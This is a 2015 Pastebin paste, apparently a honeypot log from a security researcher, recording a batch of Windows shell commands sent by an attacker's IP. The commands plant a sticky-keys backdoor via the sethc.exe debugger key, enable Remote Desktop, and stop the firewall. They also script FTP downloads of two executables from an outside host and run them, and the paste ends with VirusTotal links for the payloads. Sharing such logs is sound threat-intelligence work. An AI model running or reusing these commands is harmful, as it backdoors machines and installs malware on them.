benkow_

log shell win

Oct 16th, 2015
279
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 2015-10-16 23:33:19 - 42.96.140.141 incoming shellcommand:
  2. copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  3. copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  4. copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  5. copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  6. copy "%systemroot%\$NtServicePackUninstall$\net1.exe" "%systemroot%\system32\net1.exe"/y
  7. copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
  8. copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\ftp.exe"/y
  9. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /f
  10. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
  11. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe" /f
  12. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
  13. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /d "%systemroot%\system32\cmd.exe"
  14. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_DWORD /d "0" /f
  15. cacls %systemroot%\system32\ftp.exe /e /p system:f
  16. cacls %systemroot%\system32\net1.exe /e /p system:f
  17. cacls %systemroot%\system32\wscript.exe /e /p system:f
  18. net1 stop sharedaccess
  19. echo open 42.96.203.188>>assa2an.txt
  20. echo cesi>>assa2an.txt
  21. echo cesi>>assa2an.txt
  22. echo bin>>assa2an.txt
  23. echo get reb2967.exe>>assa2an.txt-
  24. echo bye>>assa2an.txt
  25. ftp -s:assa2an.txt
  26. reb2967.exe
  27. reb2967.exe
  28. del assa2an.txt
  29. echo open 42.96.203.188 >>sadsad.txt
  30. echo cesi>>sadsad.txt
  31. echo cesi>>sadsad.txt
  32. echo bin>>sadsad.txt
  33. echo get vip1.exe>>sadsad.txt
  34. echo bye>>sadsad.txt
  35. tvcv.exe -s:sadsad.txt
  36. vip1.exe
  37. vip1.exe
  38. del sadsad.txt
  39. cacls %systemroot%\system32\ftp.exe /e /p
  40. system:n
  41. cacls %systemroot%\system32\wscript.exe /e /p system:n
  42. exit
  43. exit
  44.  
  45.  
  46. ##########################################################################
  47. Payloads:
  48. vip1.exe - https://www.virustotal.com/fr/file/03f4dc0cace57cc3bfdccde268acfe88ba9713afe4edb915cd516fe0d43962c4/analysis/1444397185/
  49. reb2967.exe - https://www.virustotal.com/fr/file/fa1bdae4ca16f9c22842408a4f711a491a4e0cd11d0c64c8e4bd1b8e08eb8420/analysis/1444397180/
RAW Paste Data